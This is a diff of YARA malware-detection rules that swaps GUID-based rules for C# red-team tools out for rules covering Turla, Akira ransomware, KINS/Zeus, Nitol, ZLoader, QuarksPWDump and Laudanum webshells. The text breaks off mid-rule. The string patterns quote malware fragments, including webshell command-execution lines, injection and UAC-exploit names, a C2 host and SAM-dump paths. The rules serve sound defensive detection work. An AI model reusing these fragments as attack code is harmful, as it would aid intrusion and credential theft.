+rule SIGNATURE_BASE_APT_Turla_Agent_BTZ_Gen_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "2dde9632-10c5-5c91-8bd9-2fb80d6f0c49"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/EncodeGroup/UAC-SilentClean"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1003-L1016"
+		description = "Detects Turla Agent.BTZ"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d5e1dd3d-4f03-5f79-898b-e612d2758b60"
+		date = "2018-06-16"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_agent_btz.yar#L75-L106"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "32d331148578923e7f5017ce874f9daa234a759ea5a87cbddc1e111834acf920"
-		score = 75
+		logic_hash = "8616d95e683f213916f06a7bf672ced90b2fa55cb4331176021614b4f0b03aed"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c905f2dec79ccab115ad32578384008696ebab02276f49f12465dcd026c1a615"
 
 	strings:
-		$typelibguid0lo = "948152a4-a4a1-4260-a224-204255bfee72" ascii wide
+		$x1 = "1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s" fullword ascii
+		$s1 = "release mutex - %u (%u)(%u)" fullword ascii
+		$s2 = "\\system32\\win.com" ascii
+		$s3 = "Command Id:%u%010u(%02d:%02d:%02d %02d/%02d/%04d)" fullword ascii
+		$s4 = "MakeFile Error(%d) copy file to temp file %s" fullword ascii
+		$s5 = "%s%%s08x.tmp" fullword ascii
+		$s6 = "Run instruction: %d ID:%u%010u(%02d:%02d:%02d %02d/%02d/%04d)" fullword ascii
+		$s7 = "Mutex_Log" fullword ascii
+		$s8 = "%s\\system32\\winview.ocx" fullword ascii
+		$s9 = "Microsoft(R) Windows (R) Operating System" fullword wide
+		$s10 = "Error: pos(%d) > CmdSize(%d)" fullword ascii
+		$s11 = "\\win.com" ascii
+		$s12 = "Error(%d) run %s " fullword ascii
+		$s13 = "%02d.%02d.%04d Log begin:" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "9d0d6daa47d6e6f2d80eb05405944f87" or ( pe.exports ( "Entry" ) and pe.exports ( "InstallM" ) and pe.exports ( "InstallS" ) ) or $x1 or 3 of them ) or ( 5 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Desktopgrabber : FILE
+rule SIGNATURE_BASE_MAL_WIN_Akira_Apr25 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "7db07291-d6d4-5527-a879-27f899dbd6fe"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/NYAN-x-CAT/DesktopGrabber"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1018-L1031"
+		description = "This Yara rule from ISH Tecnologia's Heimdall Security Research Team detects key components of Akira Ransomware"
+		author = "0x0d4y-Icaro Cesar"
+		id = "76722cb6-70be-465f-9ef1-afd78f694289"
+		date = "2025-04-11"
+		modified = "2025-04-16"
+		reference = "https://ish.com.br/wp-content/uploads/2025/04/A-Anatomia-do-Ransomware-Akira-e-sua-expansao-multiplataforma.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_win_akira_apr25.yar#L1-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1937fa6b9e5af3c12a2eef6356aed2c93e6534db492ebc7a8955c4cac240a840"
-		score = 75
+		hash = "205589629ead5d3c1d9e914b49c08589"
+		logic_hash = "112f844dff4c48d861f86736503da51e8fbc58805f463df1f9358781034f2e24"
+		score = 90
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		rule_matching_tlp = "TLP:WHITE"
+		rule_sharing_tlp = "TLP:WHITE"
+		malpedia_family = "win.akira"
 
 	strings:
-		$typelibguid0lo = "e6aa0cd5-9537-47a0-8c85-1fbe284a4380" ascii wide
+		$code_custom_algorithm = { 44 8B CF 90 42 0F B6 4C 0D ?? 83 E9 4E 44 8D 04 89 45 03 C0 B8 09 04 02 81 41 F7 E8 41 03 D0 C1 FA 06 8B C2 C1 E8 1F 03 D0 6B C2 7F 44 2B C0 41 83 C0 7F B8 09 04 02 81 41 F7 E8 41 03 D0 C1 FA 06 8B C2 C1 E8 1F 03 D0 6B C2 7F 44 2B C0 46 88 44 0D ?? 49 FF C1 }
+		$code_aes_key_expansion = { 41 8D 41 FF 33 D2 8B 0C ?? 41 8B C1 41 F7 F2 85 D2 75 ?? 44 8B C1 0F B6 C1 0F B6 0C ?? 41 8B C0 48 C1 E8 ?? C1 E1 ?? 0F B6 04 ?? 0B C8 41 8B C0 48 C1 E8 ?? C1 E1 ?? 0F B6 D0 49 C1 E8 ?? 0F B6 04 ?? 0B C8 41 0F B6 C0 C1 E1 ?? 0F B6 14 ?? 0F B6 45 00 0B CA 33 C8 48 FF C5 }
+		$akira_str_I = "akira" ascii
+		$akira_str_II = "onion" ascii
+		$akira_str_III = "powershell" ascii
+		$akira_str_IV = "akira_readme.txt" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and all of ( $code_* ) and all of ( $akira_str_* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Wsmanager : FILE
+rule SIGNATURE_BASE_KINS_Dropper
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "b8c330dc-74aa-5a33-8af6-17c9beb8be81"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/guillaC/wsManager"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1033-L1046"
+		description = "Match protocol, process injects and windows exploit present in KINS dropper"
+		author = "AlienVault Labs aortega@alienvault.com"
+		id = "17e12685-aaad-5d83-949c-43d5aef1ef0d"
+		date = "2016-02-15"
+		modified = "2023-12-05"
+		reference = "http://goo.gl/arPhm3"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_kins_dropper.yar#L1-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cbcdcf8c4895263b881f45f54df01b6a6a3d76cf1be195475217ccffa9eedfed"
+		logic_hash = "cdab93f823e13e0c3104de8e05cb1572f83fb5294f359698092d73fc7983955b"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$typelibguid0lo = "9480809e-5472-44f3-b076-dcdf7379e766" ascii wide
+		$n1 = "tid=%d&ta=%s-%x" fullword
+		$n2 = "fid=%d" fullword
+		$n3 = "%[^.].%[^(](%[^)])" fullword
+		$i0 = "%s [%s %d] 77 %s"
+		$i01 = "Global\\%s%x"
+		$i1 = "Inject::InjectProcessByName()"
+		$i2 = "Inject::CopyImageToProcess()"
+		$i3 = "Inject::InjectProcess()"
+		$i4 = "Inject::InjectImageToProcess()"
+		$i5 = "Drop::InjectStartThread()"
+		$uac1 = "ExploitMS10_092"
+		$uac2 = "\\globalroot\\systemroot\\system32\\tasks\\" ascii wide
+		$uac3 = "<RunLevel>HighestAvailable</RunLevel>" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		2 of ( $n* ) and 2 of ( $i* ) and 2 of ( $uac* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Uglyexe : FILE
+rule SIGNATURE_BASE_KINS_DLL_Zeus
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5833e6c5-f078-5eb5-9519-76710d7da0e1"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/fashionproof/UglyEXe"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1048-L1061"
+		description = "Match default bot in KINS leaked dropper, Zeus"
+		author = "AlienVault Labs aortega@alienvault.com"
+		id = "968ada06-c8a1-5053-95de-10aa484231cb"
+		date = "2016-02-15"
+		modified = "2023-12-05"
+		reference = "http://goo.gl/arPhm3"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_kins_dropper.yar#L28-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "caf7c8ae7060822e0014710e521020e5d502eedb505165374b7600b11dea7bad"
+		logic_hash = "bd1ebe7976d1f93856b4f8d1d62d8fff68ce6234204da9fbdc233ddbef56864d"
 		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		quality = 60
+		tags = ""
 
 	strings:
-		$typelibguid0lo = "233de44b-4ec1-475d-a7d6-16da48d6fc8d" ascii wide
+		$n1 = "%BOTID%" fullword
+		$n2 = "%opensocks%" fullword
+		$n3 = "%openvnc%" fullword
+		$n4 = /Global\\(s|v)_ev/ fullword
+		$s1 = "\x72\x6E\x6D\x2C\x36\x7D\x76\x77"
+		$s2 = "\x18\x04\x0F\x12\x16\x0A\x1E\x08\x5B\x11\x0F\x13"
+		$s3 = "\x39\x1F\x01\x07\x15\x19\x1A\x33\x19\x0D\x1F"
+		$s4 = "\x62\x6F\x71\x78\x63\x61\x7F\x69\x2D\x67\x79\x65"
+		$s5 = "\x6F\x69\x7F\x6B\x61\x53\x6A\x7C\x73\x6F\x71"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		all of ( $n* ) and 1 of ( $s* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpdump : FILE
+rule SIGNATURE_BASE_Backdoor_Redosdru_Jun17 : HIGHVOL FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "b613092f-9006-5405-b07e-59737410ac1e"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/GhostPack/SharpDump"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1063-L1076"
+		description = "Detects malware Redosdru - file systemHome.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ea038142-6903-5d08-ac89-70c1bbef716c"
+		date = "2017-06-04"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/OOB3mH"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eternalblue_non_wannacry.yar#L12-L36"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "95217122df1b56132e7774c10c0e993d914cdf8e2463f949cfbab59cb0d99ca4"
+		logic_hash = "99218c4decf98f02eb75c3c41a56f857a07779c68d30c4d16ca605052c4f9c3e"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = "HIGHVOL, FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4f49e17b457ef202ab0be905691ef2b2d2b0a086a7caddd1e70dd45e5ed3b309"
 
 	strings:
-		$typelibguid0lo = "79c9bba3-a0ea-431c-866c-77004802d8a0" ascii wide
+		$x1 = "%s\\%d.gho" fullword ascii
+		$x2 = "%s\\nt%s.dll" fullword ascii
+		$x3 = "baijinUPdate" fullword ascii
+		$s1 = "RegQueryValueEx(Svchost\\netsvcs)" fullword ascii
+		$s2 = "serviceone" fullword ascii
+		$s3 = "\x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#f \x1f#" fullword ascii
+		$s4 = "servicetwo" fullword ascii
+		$s5 = "UpdateCrc" fullword ascii
+		$s6 = "\x1f#[ \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#" fullword ascii
+		$s7 = "nwsaPAgEnT" fullword ascii
+		$s8 = "%-24s %-15s 0x%x(%d) " fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 700KB and 1 of ( $x* ) or 4 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Educationalrat : FILE
+rule SIGNATURE_BASE_Backdoor_Nitol_Jun17 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "b1d54bea-a6c4-5c57-9ee1-7438d503b01d"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/securesean/EducationalRAT"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1078-L1091"
+		description = "Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7dd26868-59e0-51a1-b12a-3b69d6246ff5"
+		date = "2017-06-04"
+		modified = "2023-01-07"
+		reference = "https://goo.gl/OOB3mH"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eternalblue_non_wannacry.yar#L38-L61"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c46fee5ff948537fb1defe636f3987b3de52b2e37a1130b4b425c6645d74b11b"
+		logic_hash = "9035b8bd74c284f170f8c9767d96580dba243786abaa3b2e79e05a981f8fa204"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "cba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946"
 
 	strings:
-		$typelibguid0lo = "8a18fbcf-8cac-482d-8ab7-08a44f0e278e" ascii wide
+		$x1 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)" fullword ascii
+		$x2 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)" fullword ascii
+		$x3 = "TCPConnectFloodThread.target = %s" fullword ascii
+		$s1 = "\\Program Files\\Internet Explorer\\iexplore.exe" ascii
+		$s2 = "%c%c%c%c%c%c.exe" fullword ascii
+		$s3 = "GET %s%s HTTP/1.1" fullword ascii
+		$s4 = "CCAttack.target = %s" fullword ascii
+		$s5 = "Accept-Language: zh-cn" fullword ascii
+		$s6 = "jdfwkey" fullword ascii
+		$s7 = "hackqz.f3322.org:8880" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or 5 of ( $s* ) ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Stealth_Kid_RAT : FILE
+rule SIGNATURE_BASE_MAL_DOC_Zloader_Oct20_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "f26e040a-dcc7-518f-89f2-3333f83fa14a"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/ctsecurity/Stealth-Kid-RAT"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1093-L1107"
+		description = "Detects weaponized ZLoader documents"
+		author = "Florian Roth (Nextron Systems)"
+		id = "34145746-9733-5dd9-9dcf-99e3a3ceee4f"
+		date = "2020-10-10"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/JohnLaTwC/status/1314602421977452544"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_zloader_maldocs.yar#L2-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9a885a48053d501273fc8043e990166558458239781feb9e09f972c52d57e8da"
+		logic_hash = "6f546a860361d3caff99c282465dbbd1880460c7491a1b5ad065c1b5d91e5d49"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "668ca7ede54664360b0a44d5e19e76beb92c19659a8dec0e7085d05528df42b5"
+		hash2 = "a2ffabbb1b5a124f462a51fee41221081345ec084d768ffe1b1ef72d555eb0a0"
+		hash3 = "d268af19db475893a3d19f76be30bb063ab2ca188d1b5a70e51d260105b201da"
 
 	strings:
-		$typelibguid0lo = "bf43cd33-c259-4711-8a0e-1a5c6c13811d" ascii wide
-		$typelibguid1lo = "e5b9df9b-a9e4-4754-8731-efc4e2667d88" ascii wide
+		$sc1 = { 78 4E FC 04 AB 6B 17 E2 33 E3 49 62 50 69 BB 60
+               31 00 1E 00 02 4B BA E2 D8 E3 92 22 1E 69 96 20
+               98 }
+		$sc2 = { 6B 9E E2 36 E3 69 62 72 69 3A 60 55 6E }
+		$sc3 = { 3E 69 76 60 59 6E 34 FB 87 6B 75 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0xcfd0 and filesize < 40KB and filesize > 30KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpcradle : FILE
+rule SIGNATURE_BASE_Quarkspwdump_Gen
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "e2123a73-2609-559d-a122-923ebf8fd668"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/anthemtotheego/SharpCradle"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1109-L1122"
+		description = "Detects all QuarksPWDump versions"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7de4f59e-6cf5-5ad7-ae1f-8532d9e80c9e"
+		date = "2015-09-29"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_quarkspwdump.yar#L2-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4213877aaf5606c9e5f3f38a1f057f8068e0fa062a5f1eb4389d83c6032df6c3"
-		score = 75
+		logic_hash = "327235260076f97c29acc1ca997205d08ef55fad795594fe2268f1d8e666d636"
+		score = 80
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2b86e6aea37c324ce686bd2b49cf5b871d90f51cec24476daa01dd69543b54fa"
+		hash2 = "87e4c76cd194568e65287f894b4afcef26d498386de181f568879dde124ff48f"
+		hash3 = "a59be92bf4cce04335bd1a1fcf08c1a94d5820b80c068b3efe13e2ca83d857c9"
+		hash4 = "c5cbb06caa5067fdf916e2f56572435dd40439d8e8554d3354b44f0fd45814ab"
+		hash5 = "677c06db064ee8d8777a56a641f773266a4d8e0e48fbf0331da696bea16df6aa"
+		hash6 = "d3a1eb1f47588e953b9759a76dfa3f07a3b95fab8d8aa59000fd98251d499674"
+		hash7 = "8a81b3a75e783765fe4335a2a6d1e126b12e09380edc4da8319efd9288d88819"
 
 	strings:
-		$typelibguid0lo = "f70d2b71-4aae-4b24-9dae-55bc819c78bb" ascii wide
+		$s1 = "OpenProcessToken() error: 0x%08X" fullword ascii
+		$s2 = "%d dumped" fullword ascii
+		$s3 = "AdjustTokenPrivileges() error: 0x%08X" fullword ascii
+		$s4 = "\\SAM-%u.dmp" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Bypassuac : FILE
+rule SIGNATURE_BASE_Asp_File : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "327f581e-1d8c-5d20-bdd7-a29810c619c9"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/cnsimo/BypassUAC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1124-L1138"
+		description = "Laudanum Injector Tools - file file.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e2a80d1f-f2bb-573b-b68c-71e4dfa6e1fa"
+		date = "2015-06-22"
+		modified = "2023-12-05"
+		reference = "http://laudanum.inguardians.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_laudanum_webshells.yar#L8-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "05dbd4d443664735a10bd48dbbda4edf7ba3756c9dd3f53cb25e066e8f5f1b61"
+		hash = "ff5b1a9598735440bdbaa768b524c639e22f53c5"
+		logic_hash = "9ec19a994571f4d1b40b6d6af3fb6eb4c5004a6439b99863b50dae0262677263"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "4e7c140d-bcc4-4b15-8c11-adb4e54cc39a" ascii wide
-		$typelibguid1lo = "cec553a7-1370-4bbc-9aae-b2f5dbde32b0" ascii wide
+		$s1 = "' *** Written by Tim Medin <tim@counterhack.com>" fullword ascii
+		$s2 = "Response.BinaryWrite(stream.Read)" fullword ascii
+		$s3 = "Response.Write(Response.Status & Request.ServerVariables(\"REMOTE_ADDR\"))" fullword ascii
+		$s4 = "%><a href=\"<%=Request.ServerVariables(\"URL\")%>\">web root</a><br/><%" fullword ascii
+		$s5 = "set folder = fso.GetFolder(path)" fullword ascii
+		$s6 = "Set file = fso.GetFile(filepath)" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x253c and filesize < 30KB and 5 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Hanzoinjection : FILE
+rule SIGNATURE_BASE_Php_Killnc : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "c432bf68-49bf-57c7-bbfa-7bd2f3506c52"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/P0cL4bs/hanzoInjection"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1140-L1153"
+		description = "Laudanum Injector Tools - file killnc.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "241611d3-3636-5a25-b3c3-d45d6cb81c78"
+		date = "2015-06-22"
+		modified = "2023-12-05"
+		reference = "http://laudanum.inguardians.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_laudanum_webshells.yar#L28-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "692e5288fffb8eb65b6f84017c31bb3d5d7320c141cd5a60eef6d9482385bb88"
+		hash = "c0dee56ee68719d5ec39e773621ffe40b144fda5"
+		logic_hash = "431a9a66f5d0e42856ca5716c2994c018f77cc338300abd71d94ffe7e75da3bf"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "32e22e25-b033-4d98-a0b3-3d2c3850f06c" ascii wide
+		$s1 = "if ($_SERVER[\"REMOTE_ADDR\"] == $IP)" fullword ascii
+		$s2 = "header(\"HTTP/1.0 404 Not Found\");" fullword ascii
+		$s3 = "<?php echo exec('killall nc');?>" fullword ascii
+		$s4 = "<title>Laudanum Kill nc</title>" fullword ascii
+		$s5 = "foreach ($allowedIPs as $IP) {" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 15KB and 4 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Clr_Meterpreter : FILE
+rule SIGNATURE_BASE_Asp_Shell : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "1d8a9717-4d80-5fb1-9c57-9b5f6c5a18b0"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/OJ/clr-meterpreter"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1155-L1173"
+		description = "Laudanum Injector Tools - file shell.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3ae27254-325a-5358-b5aa-ab24b43ad5a6"
+		date = "2015-06-22"
+		modified = "2023-12-05"
+		reference = "http://laudanum.inguardians.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_laudanum_webshells.yar#L47-L66"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5d48897457c5f3ea7a9c24a24ab63207c3841bc3ac444d1c42987cb291f05941"
+		hash = "8bf1ff6f8edd45e3102be5f8a1fe030752f45613"
+		logic_hash = "af9c5cf7125e1210761e720c5f30527ac6345b5029b087807309000a29b67f6e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "6840b249-1a0e-433b-be79-a927696ea4b3" ascii wide
-		$typelibguid1lo = "67c09d37-ac18-4f15-8dd6-b5da721c0df6" ascii wide
-		$typelibguid2lo = "e05d0deb-d724-4448-8c4c-53d6a8e670f3" ascii wide
-		$typelibguid3lo = "c3cc72bf-62a2-4034-af66-e66da73e425d" ascii wide
-		$typelibguid4lo = "7ace3762-d8e1-4969-a5a0-dcaf7b18164e" ascii wide
-		$typelibguid5lo = "3296e4a3-94b5-4232-b423-44f4c7421cb3" ascii wide
+		$s1 = "<form action=\"shell.asp\" method=\"POST\" name=\"shell\">" fullword ascii
+		$s2 = "%ComSpec% /c dir" fullword ascii
+		$s3 = "Set objCmd = wShell.Exec(cmd)" fullword ascii
+		$s4 = "Server.ScriptTimeout = 180" fullword ascii
+		$s5 = "cmd = Request.Form(\"cmd\")" fullword ascii
+		$s6 = "' ***  http://laudanum.secureideas.net" fullword ascii
+		$s7 = "Dim wshell, intReturn, strPResult" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 15KB and 4 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_BYTAGE : FILE
+rule SIGNATURE_BASE_Settings : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
